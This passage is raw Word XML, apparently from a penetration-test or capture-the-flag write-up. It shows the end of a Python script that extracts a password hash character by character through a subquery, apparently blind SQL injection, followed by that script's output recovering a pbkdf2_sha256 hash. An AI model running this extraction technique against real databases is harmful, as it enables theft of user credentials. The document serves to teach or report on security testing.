          <w:p w14:paraId="25493CAF" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    print(f"[+] Password length: {length}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05A9DD78" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    result = ""</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60A1FA8A" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    for pos in range(1, length + 1):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="411577F2" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>        c = get_char(SUBQUERY, pos)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FA74365" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>        result += c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED17AA4" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>        print(f"[{pos}/{length}] {result}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="455AD6A5" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    print(f"\n[+] Recovered hash: {result}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48E95587" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3A82F0DD" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A09216" w14:textId="28E8A3E4" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001221CA">
              <w:t>    main()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51F0700A" w14:textId="43F98514" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77A48867" w14:textId="77777777" w:rsidR="001221CA" w:rsidRPr="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r w:rsidRPr="001221CA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r w:rsidRPr="001221CA">
        <w:t>The script first determined the password length to be 89 characters, then recovered each character in turn, printing its progress:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10790"/>
      </w:tblGrid>
      <w:tr w:rsidR="001221CA" w:rsidRPr="001221CA" w14:paraId="3E22C7B6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3EF27F1F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[+] Password length: 89</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7803A0AD" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[1/89] p</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E37F393" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[2/89] pb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03882972" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[3/89] pbk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19AAA221" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[4/89] pbkd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="421A89CE" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[5/89] pbkdf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F25780F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[6/89] pbkdf2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B7B9138" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[7/89] pbkdf2_</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E7EECE8" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[8/89] pbkdf2_s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="265358C6" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[9/89] pbkdf2_sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66816B42" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[10/89] pbkdf2_sha</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DFCC02F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[11/89] pbkdf2_sha2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3465928F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[12/89] pbkdf2_sha25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37B4365E" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[13/89] pbkdf2_sha256</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17967364" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[14/89] pbkdf2_sha256$</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01D5827F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[15/89] pbkdf2_sha256$1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76FBFA54" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[16/89] pbkdf2_sha256$15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BBF7190" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[17/89] pbkdf2_sha256$150</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A747442" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[18/89] pbkdf2_sha256$1500</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="209CE4BD" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[19/89] pbkdf2_sha256$15000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DFFFB8E" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[20/89] pbkdf2_sha256$150000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="206248B6" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[21/89] pbkdf2_sha256$1500000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="758C2496" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[22/89] pbkdf2_sha256$1500000$</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C6490B8" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[23/89] pbkdf2_sha256$1500000$c</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5910B0FE" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[24/89] pbkdf2_sha256$1500000$cD</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7062EB6B" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[25/89] pbkdf2_sha256$1500000$cDS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DEE5E56" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[26/89] pbkdf2_sha256$1500000$cDSe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CA5C376" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[27/89] pbkdf2_sha256$1500000$cDSej</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E4864E0" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[28/89] pbkdf2_sha256$1500000$cDSejG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A52CB81" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[29/89] pbkdf2_sha256$1500000$cDSejGZ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7555DD71" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[30/89] pbkdf2_sha256$1500000$cDSejGZV</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A1D201F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[31/89] pbkdf2_sha256$1500000$cDSejGZVw</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A665101" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[32/89] pbkdf2_sha256$1500000$cDSejGZVwh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="523E640F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[33/89] pbkdf2_sha256$1500000$cDSejGZVwhE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E918557" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[34/89] pbkdf2_sha256$1500000$cDSejGZVwhE9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB5380A" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[35/89] pbkdf2_sha256$1500000$cDSejGZVwhE9d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1633C4E2" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[36/89] pbkdf2_sha256$1500000$cDSejGZVwhE9da</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B14BF48" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[37/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dah</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FB1B4D" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[38/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahY</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D533343" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[39/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BE26676" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[40/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07817D89" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[41/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3q</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB99AE2" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[42/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="247786BA" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[43/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qfl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18785102" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[44/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC87F7C" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[45/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58CF9601" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>[46/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EBA9C06" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[47/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2s</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48006F17" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[48/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53B2A82F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[49/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07EB0352" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[50/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3u</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DEB1802" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[51/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F04FFE9" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[52/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DDA58CD" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[53/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C8D6B11" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[54/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="385146AA" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[55/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2110B948" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[56/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A0CA9D" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[57/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48899924" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[58/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C4C514" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[59/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1v</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54C989A6" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[60/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1va</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B28909" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[61/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="263FEF0B" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[62/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaao</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC24B7D" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[63/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaob</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D6FA17" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[64/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F450B9D" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[65/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26DB55E9" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[66/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1D</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477B973F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[67/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B66304A" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[68/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEa</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A577002" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[69/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaB</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1770D093" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[70/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DFE54B1" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[71/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJ</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0103FA79" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[72/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10ACA437" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[73/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A24848F" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[74/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIG</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75FE383A" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[75/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34BFFC29" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[76/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44398ABC" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[77/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXI</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E8C1FF7" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[78/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXIC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B3467D" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[79/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48A3D159" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[80/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmb</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FA3160D" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[81/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E91DEF1" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[82/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdA</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D22A4CE" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[83/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35196A33" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:t>[84/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B0BE7A4" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>[85/89] pbkdf2_sha256$1500000$cDSejGZVwhE9dahYt3qflU$2sx3uowr3n5y1vaaobO1DEaBxJXIGMXICmbdAdH8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C25280" w14:textId="77777777" w:rsidR="001221CA" w:rsidRDefault="001221CA" w:rsidP="001221CA">
            <w:r>
